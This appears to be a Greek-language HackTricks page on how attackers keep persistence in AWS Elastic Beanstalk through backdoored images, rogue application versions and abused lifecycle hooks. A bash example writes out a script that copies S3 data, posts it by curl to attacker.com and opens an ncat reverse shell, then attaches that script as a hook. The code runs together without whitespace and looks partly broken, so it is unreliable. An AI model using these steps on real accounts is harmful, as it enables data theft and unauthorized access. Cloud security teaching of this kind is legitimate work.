Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs σταHackTricks και HackTricks Cloud αποθετήρια του github.
Elastic Beanstalk
Για περισσότερες πληροφορίες, ελέγξτε:
Μόνιμη Αποθήκευση στην Εικόνα
Προκειμένου να διατηρηθεί η μόνιμη αποθήκευση μέσα στον λογαριασμό AWS, μπορεί να εισαχθεί ένας μηχανισμός μόνιμης αποθήκευσης μέσα στην εικόνα (cron job, ssh key...) έτσι ώστε ο επιτιθέμενος να μπορεί να έχει πρόσβαση και να κλέψει διαπιστευτήρια ρόλου IAM από την υπηρεσία μεταδεδομένων.
Παρασιτικός κώδικας στην Έκδοση
Ένας επιτιθέμενος μπορεί να εισάγει παρασιτικό κώδικα μέσα στο αποθετήριο S3 έτσι ώστε να εκτελεί πάντα τον παρασιτικό κώδικα και όχι τον αναμενόμενο κώδικα.
Νέα παρασιτική έκδοση
Αντί να αλλάξει τον κώδικα στην πραγματική έκδοση, ο επιτιθέμενος μπορεί να αναπτύξει μια νέα παρασιτική έκδοση της εφαρμογής.
Κατάχρηση Αγκίστρων Ζωής Προσαρμοσμένου Πόρου
TODO: Ελέγξτε
Το Elastic Beanstalk παρέχει αγκίστρα ζωής που σας επιτρέπουν να εκτελέσετε προσαρμοσμένα scripts κατά τη διάρκεια της παροχής και της τερματισμού των παραδειγμάτων. Ένας επιτιθέμενος μπορεί να διαμορφώσει ένα αγκίστρων ζωής για να εκτελεί περιοδικά ένα script που εξαφανίζει δεδομένα ή διατηρεί πρόσβαση στον λογαριασμό AWS.
bashCopycode#Attackercreatesascriptthatexfiltratesdataandmaintainsaccessecho'#!/bin/bashaws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csvgzip /tmp/data.csvcurl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfilncat -e /bin/bash --ssl attacker-ip 12345'>stealthy_lifecycle_hook.sh# Attacker uploads the script to an S3 bucketawss3cpstealthy_lifecycle_hook.shs3://attacker-bucket/stealthy_lifecycle_hook.sh# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hookecho'Resources:AWSEBAutoScalingGroup:Metadata:AWS::ElasticBeanstalk::Ext:TriggerConfiguration:triggers:- name: stealthy-lifecycle-hookevents:- "autoscaling:EC2_INSTANCE_LAUNCH"- "autoscaling:EC2_INSTANCE_TERMINATE"target:ref: "AWS::ElasticBeanstalk::Environment"arn:Fn::GetAtt:- "AWS::ElasticBeanstalk::Environment"- "Arn"stealthyLifecycleHook:Type: AWS::AutoScaling::LifecycleHookProperties:AutoScalingGroupName:Ref: AWSEBAutoScalingGroupLifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHINGNotificationTargetARN:Ref: stealthy-lifecycle-hookRoleARN:Fn::GetAtt:- AWSEBAutoScalingGroup- Arn'>stealthy_lifecycle_hook.yaml# Attacker applies the new environment configurationaws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"